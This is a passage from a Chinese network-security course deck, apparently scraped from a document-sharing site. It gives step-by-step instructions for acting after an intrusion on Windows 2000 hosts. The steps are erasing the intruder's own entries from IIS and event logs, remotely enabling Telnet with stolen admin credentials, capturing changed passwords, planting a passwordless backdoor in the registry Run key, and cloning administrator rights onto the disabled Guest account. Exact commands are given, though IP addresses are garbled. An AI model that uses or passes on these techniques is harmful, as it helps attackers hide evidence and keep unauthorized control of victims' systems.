訪問(wèn)時(shí)間等信息。這些信息記錄在Winnt\System32\logFiles目錄下,如圖所示2.1清除IIS日志打開(kāi)任一文件夾下的任一文件,可以看到IIS日志的基本格式,記錄了用戶訪問(wèn)的服務(wù)器文件、用戶登的時(shí)間、用戶的IP地址以及用戶瀏覽器以及操作系統(tǒng)的版本號(hào)。如圖所示2.1清除IIS日志最簡(jiǎn)單的方法是直接到該目錄下刪除這些文件夾,但是全部刪除文件以后,一定會(huì)引起管理員的懷疑。一般入侵的過(guò)程是短暫的,只會(huì)保存到一個(gè)Log文件,只要在該Log文件刪除所有自己的記錄就可以了。
2.1清除IIS日志使用工具軟件CleanIISLog.exe可以做到這一點(diǎn),首先將該文件拷貝到日志文件所在目錄,然后執(zhí)行命令“CleanIISLog.exeex031108.log10”,第一個(gè)參數(shù)ex031108.log是日志文件名,文件名的后六位代表年月日,第二個(gè)參數(shù)是要在該Log文件中刪除的IP地址,也就是自己的IP地址。先查找當(dāng)前目錄下的文件,然后做清除的操作,整個(gè)清除的過(guò)程如圖所示2.2清除主機(jī)日志主機(jī)日志包括三類的日志:應(yīng)用程序日志、安全日志和系統(tǒng)日志。可以在計(jì)算機(jī)上通過(guò)控制面板下的“事件查看器”查看日志信息,如圖所示2.2清除主機(jī)日志使用工具軟件clearel.exe,可以方便的清除系統(tǒng)日志,首先將該文件上傳到對(duì)方主機(jī),然后刪除這三種日志的命令格式為:ClearelSystemClearelSecurityClearelApplicationClearelAll這四條命令分別刪除系統(tǒng)日志、安全日志、應(yīng)用程序日志和刪除全部日志。命令執(zhí)行的過(guò)程如圖所示執(zhí)行完畢后,再打開(kāi)事件查看器,發(fā)現(xiàn)都已經(jīng)空了。如圖所示3留后門(mén)網(wǎng)絡(luò)后門(mén)是保持對(duì)目標(biāo)主機(jī)長(zhǎng)久控制的關(guān)鍵策略??梢酝ㄟ^(guò)建立服務(wù)端口和克隆管理員帳號(hào)來(lái)實(shí)現(xiàn)。3.1常見(jiàn)后門(mén)工具使用3.1.1利用RTCS.vbe可以遠(yuǎn)程啟動(dòng)對(duì)方主機(jī)的telnet服務(wù)3.1.2利用Win2kPass.exe記錄修改的新密碼3.1.3利用wnc.exe可以在對(duì)方主機(jī)上開(kāi)啟web服務(wù)和telnet服務(wù)3.1.4使用工具軟件psu.exe可以使禁用的guest具有管理權(quán)限3.1.1利用RTCS.vbe可以遠(yuǎn)程啟動(dòng)對(duì)方主機(jī)的telnet服務(wù)
案例6-1遠(yuǎn)程啟動(dòng)Telnet服務(wù)利用主機(jī)上的Telnet服務(wù),有管理員密碼就可以登錄到對(duì)方的命令行,進(jìn)而操作對(duì)方的文件系統(tǒng)。如果Telnet服務(wù)是關(guān)閉的,就不能登錄了。默認(rèn)情況下,Windows2000Server的Telnet是關(guān)閉的,可以在運(yùn)行窗口中輸入tlntadmn.exe命令啟動(dòng)本地Telnet服務(wù),如圖6-1所示。3.1.1利用RTCS.vbe可以遠(yuǎn)程啟動(dòng)對(duì)方主機(jī)的telnet服務(wù)
啟動(dòng)本地Telnet服務(wù)在啟動(dòng)的DOS窗口中輸入4就可以啟動(dòng)本地Telnet服務(wù)了,如圖6-2所示。
3.1.1利用RTCS.vbe可以遠(yuǎn)程啟動(dòng)對(duì)方主機(jī)的telnet服務(wù)利用工具RTCS.vbe可以遠(yuǎn)程開(kāi)啟對(duì)方的Telnet服務(wù),使用該工具需要知道對(duì)方具有管理員權(quán)限的用戶名和密碼。命令的語(yǔ)法是:“cscript
RTCS.vbe09administrator123456123”,其中cscript是操作系統(tǒng)自帶的命令RTCS.vbe是該工具軟件腳本文件IP地址是要啟動(dòng)Telnet的主機(jī)地址administrator是用戶名123456是密碼1是登錄系統(tǒng)的驗(yàn)證方式23是Telnet開(kāi)放的端口該命令根據(jù)網(wǎng)絡(luò)的速度,執(zhí)行的時(shí)候需要一段時(shí)間,開(kāi)啟遠(yuǎn)程主機(jī)Telnet服務(wù)的過(guò)程如圖6-3所示。3.1.1遠(yuǎn)程開(kāi)啟對(duì)方的Telnet服務(wù)
3.1.1利用RTCS.vbe可以遠(yuǎn)程啟動(dòng)對(duì)方主機(jī)的telnet服務(wù)執(zhí)行完成后,對(duì)方的Telnet服務(wù)就被開(kāi)啟了。在DOS提示符下,登錄目標(biāo)主機(jī)的Telnet服務(wù),首先輸入命令“Telnet09”,因?yàn)門(mén)elnet的用戶名和密碼是明文傳遞的,首先出現(xiàn)確認(rèn)發(fā)送信息對(duì)話框,如圖6-4所示。3.1.1利用RTCS.vbe可以遠(yuǎn)程啟動(dòng)對(duì)方主機(jī)的telnet服務(wù)
登錄Telnet的用戶名和密碼輸入字符“y”,進(jìn)入Telnet的登錄界面,需要輸入主機(jī)的用戶名和密碼,如圖6-5所示。3.1.1利用RTCS.vbe可以遠(yuǎn)程啟動(dòng)對(duì)方主機(jī)的telnet服務(wù)
登錄Telnet服務(wù)器如果用戶名和密碼沒(méi)有錯(cuò)誤,將進(jìn)入對(duì)方主機(jī)的命令行,如圖6-6所示。3.1.2利用Win2kPass.exe記錄修改的新密碼當(dāng)入侵到對(duì)方主機(jī)并得到管理員口令以后,就可以對(duì)主機(jī)進(jìn)行長(zhǎng)久入侵了,但是一個(gè)好的管理員一般每隔半個(gè)月左右就會(huì)修改一次密碼,這樣已經(jīng)得到的密碼就不起作用了。利用工具軟件Win2kPass.exe記錄修改的新密碼,該軟件將密碼記錄在Winnt\temp目錄下的Config.ini文件中,有時(shí)候文件名可能不是Config,但是擴(kuò)展名一定是ini,該工具軟件是有“自殺”的功能,就是當(dāng)執(zhí)行完畢后,自動(dòng)刪除自己。3.1.2利用Win2kPass.exe記錄修改的新密碼首先在對(duì)方操作系統(tǒng)中執(zhí)行Win2KPass.exe文件,當(dāng)對(duì)方主機(jī)管理員密碼修改并重啟計(jì)算機(jī)以后,就在Winnt\temp目錄下產(chǎn)生一個(gè)ini文件,如圖6-7所示。3.1.3利用wnc.exe可以在對(duì)方主機(jī)上開(kāi)啟web服務(wù)和telnet服務(wù)
案例6-3建立Web服務(wù)和Telnet服務(wù)
使用工具軟件wnc.exe可以在對(duì)方的主機(jī)上開(kāi)啟兩個(gè)服務(wù):Web服務(wù)和Telnet服務(wù)。其中Web服務(wù)的端口是808,Telnet服務(wù)的端口是707。執(zhí)行很簡(jiǎn)單,只要在對(duì)方的命令行下執(zhí)行一下wnc.exe就可以,如圖6-9所示。3.1.3利用wnc.exe可以在對(duì)方主機(jī)上開(kāi)啟web服務(wù)和telnet服務(wù)執(zhí)行完畢后,利用命令“netstat-an”來(lái)查看開(kāi)啟的808和707端口,如圖6-10所示。3.1.3利用wnc.exe可以在對(duì)方主機(jī)上開(kāi)啟web服務(wù)和telnet服務(wù)說(shuō)明服務(wù)端口開(kāi)啟成功,可以連接該目標(biāo)主機(jī)提供的這兩個(gè)服務(wù)了。首先測(cè)試Web服務(wù)808端口,在瀏覽器地址欄中輸入“09:808”,出現(xiàn)主機(jī)的盤(pán)符列表,如圖6-11所示。3.1.3利用wnc.exe可以在對(duì)方主機(jī)上開(kāi)啟web服務(wù)和telnet服務(wù)可以下載對(duì)方硬盤(pán)設(shè)置光盤(pán)上的任意文件,可以到Winnt/temp目錄下查看對(duì)方密碼修改記錄文件,如圖6-12所示。3.1.3利用wnc.exe可以在對(duì)方主機(jī)上開(kāi)啟web服務(wù)和telnet服務(wù)可以利用“telnet09707”命令登錄到對(duì)方的命令行,執(zhí)行的方法如圖6-13所示。3.1.3利用wnc.exe可以在對(duì)方主機(jī)上開(kāi)啟web服務(wù)和telnet服務(wù)不用任何的用戶名和密碼就可以登錄到對(duì)方主機(jī)的命令行,如圖6-14所示。3.1.3利用wnc.exe可以在對(duì)方主機(jī)上開(kāi)啟web服務(wù)和telnet服務(wù)通過(guò)707端口也可以方便的獲得對(duì)方的管理員權(quán)限。wnc.exe的功能強(qiáng)大,但是該程序不能自動(dòng)加載執(zhí)行,需要將該文件加到自啟動(dòng)程序列表中。一般將wnc.exe文件放到對(duì)方的winnt目錄或者winnt/system32目下,這兩個(gè)目錄是系統(tǒng)環(huán)境目錄,執(zhí)行這兩個(gè)目錄下的文件不需要給出具體的路徑。3.1.3利用wnc.exe可以在對(duì)方主機(jī)上開(kāi)啟web服務(wù)和telnet服務(wù)
將wnc.exe加到自啟動(dòng)列表首先將wnc.exe和reg.exe文件拷貝對(duì)方的winnt目錄下,利用reg.exe文件將wnc.exe加載到注冊(cè)表的自啟動(dòng)項(xiàng)目中,命令的格式為:“reg.exeaddHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run/vservice/dwnc.exe”執(zhí)行過(guò)程如圖6-15所示。3.1.3利用wnc.exe可以在對(duì)方主機(jī)上開(kāi)啟web服務(wù)和telnet服務(wù)
修改后的注冊(cè)表如果可以進(jìn)入對(duì)方主機(jī)的圖形界面,可以查看一下對(duì)方的注冊(cè)表的自啟動(dòng)項(xiàng),已經(jīng)被修改,如圖6-16所示。3.1.4使用工具軟件psu.exe可以使禁用的guest具有管理權(quán)限
案例6-4讓禁用的Guest具有管理權(quán)限
操作系統(tǒng)所有的用戶信息都保存在注冊(cè)表中,但是如果直接使用“regedit”命令打開(kāi)注冊(cè)表,該鍵值是隱藏的,如圖6-17所示。3.1.4使用工具軟件psu.exe可以使禁用的guest具有管理權(quán)限
查看winlogon.exe的進(jìn)程號(hào)可以利用工具軟件psu.exe得到該鍵值的查看和編輯權(quán)。將psu.exe拷貝對(duì)方主機(jī)的C盤(pán)下,并在任務(wù)管理器查看對(duì)方主機(jī)winlogon.exe進(jìn)程的ID號(hào)或者使用pulist.exe文件查看該進(jìn)程的ID號(hào),如圖6-18所示。3.1.4使用工具軟件psu.exe可以使禁用的guest具有管理權(quán)限
執(zhí)行命令該進(jìn)程號(hào)為192,下面執(zhí)行命令“psu-pregedit-ipid”其中pid為Winlogon.exe的進(jìn)程號(hào),如圖6-19所示。3.1.4使用工具軟件psu.exe可以使禁用的guest具有管理權(quán)限
查看SAM鍵值在執(zhí)行該命令的時(shí)候必須將注冊(cè)表關(guān)閉,執(zhí)行完命令以后,自動(dòng)打開(kāi)了注冊(cè)表編輯器,查看SAM下的鍵值,如圖6-20所示。3.1.4使用工具軟件psu.exe可以使禁用的guest具有管理權(quán)限
查看帳戶對(duì)應(yīng)的鍵值查看Administrator和guest默認(rèn)的鍵值,在Windows2000操作系統(tǒng)上,Administrator一般為0x1f4,guest一般為0x1f5,如圖6-21所示。3.1.4使用工具軟件psu.exe可以使禁用的guest具有管理權(quán)限
帳戶配置信息根據(jù)“0x1f4”和“0x1f5”找到Administrator和guest帳戶的配置信息,如圖6-22所示。3.1.4使用工具軟件psu.exe可以使禁用的guest具有管理權(quán)限
拷貝管理員配置信息在圖6-22右邊欄目中的F鍵值中保存了帳戶的密碼信息,雙擊“000001F4”目錄下鍵值“F”,可以看到該鍵值的二進(jìn)制信息,將這些二進(jìn)制信息全選,并拷貝到出來(lái),如圖6-23所示。3.1.4使用工具軟件psu.exe可以使禁用的guest具有管理權(quán)限
覆蓋Guest用戶的配置信息將拷貝出來(lái)的信息全部覆蓋到“000001F5”目錄下的“F”鍵值中,如圖6-24所示。3.1.4使用工具軟件psu.exe可以使禁用的guest具有管理權(quán)限
保存鍵值Guest帳戶已經(jīng)具有管理員權(quán)限了。為了能夠使Guest帳戶在禁用的狀態(tài)登錄,下一步將Guest帳戶信息導(dǎo)出注冊(cè)表。選擇User目錄,然后選擇菜單欄“注冊(cè)表”下的菜單項(xiàng)“導(dǎo)出注冊(cè)表文件”,將該鍵值保存為一個(gè)配置文件,如圖6-25所示。3.1.4使用工具軟件psu.exe可以使禁用的guest具有管理權(quán)限
刪除Guest帳戶信息打開(kāi)計(jì)算機(jī)管理對(duì)話框,并分別刪除Guest和“00001F5”兩個(gè)目錄,如圖6-26所示。3.1.4使用工具軟件psu.exe可以使禁用的guest具有管理權(quán)限
刷新用戶列表這個(gè)刷新對(duì)方主機(jī)的用戶列表,會(huì)出現(xiàn)用戶找不到的對(duì)話框,如圖6-27所示。3.1.4使用工具軟件psu.exe可以使禁
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 2024廣告發(fā)布合同范文
- 公共場(chǎng)所環(huán)境衛(wèi)生承包合同
- 北京交通事故損害賠償協(xié)議書(shū)撰寫(xiě)指南
- 2024年交通事故調(diào)解協(xié)議書(shū)范例
- 2024清潔工勞動(dòng)合同書(shū)樣本
- 商品采購(gòu)協(xié)議
- 2024工程建設(shè)招標(biāo)投標(biāo)合同(履約銀行保證書(shū))新
- 舞蹈學(xué)校教師聘請(qǐng)協(xié)議書(shū)
- 2024《技術(shù)服務(wù)合同范本》
- 2024共事協(xié)議書(shū)樣式
- 曲靖市數(shù)字經(jīng)濟(jì)產(chǎn)業(yè)餐廚垃圾資源化再利用項(xiàng)目(重新報(bào)批)環(huán)評(píng)報(bào)告
- 小學(xué)語(yǔ)文跨學(xué)科學(xué)習(xí)任務(wù)群學(xué)習(xí)任務(wù)設(shè)計(jì)策略
- 編施工方案的目的
- 亮化工程安全施工方案
- 廣西南寧市西鄉(xiāng)塘區(qū)2023-2024學(xué)年四年級(jí)數(shù)學(xué)第一學(xué)期期末調(diào)研試題含答案
- ul2464電線線徑標(biāo)準(zhǔn)
- 《鄉(xiāng)土中國(guó)》整本書(shū)閱讀公開(kāi)課
- 氣排球比賽規(guī)則課件
- NB/T 11123-2023煤礦安全雙重預(yù)防機(jī)制規(guī)范
- 人美版小學(xué)美術(shù)六年級(jí)上冊(cè)1建筑藝術(shù)的美課件
- 氧氣瓶安全操作技術(shù)規(guī)程
評(píng)論
0/150
提交評(píng)論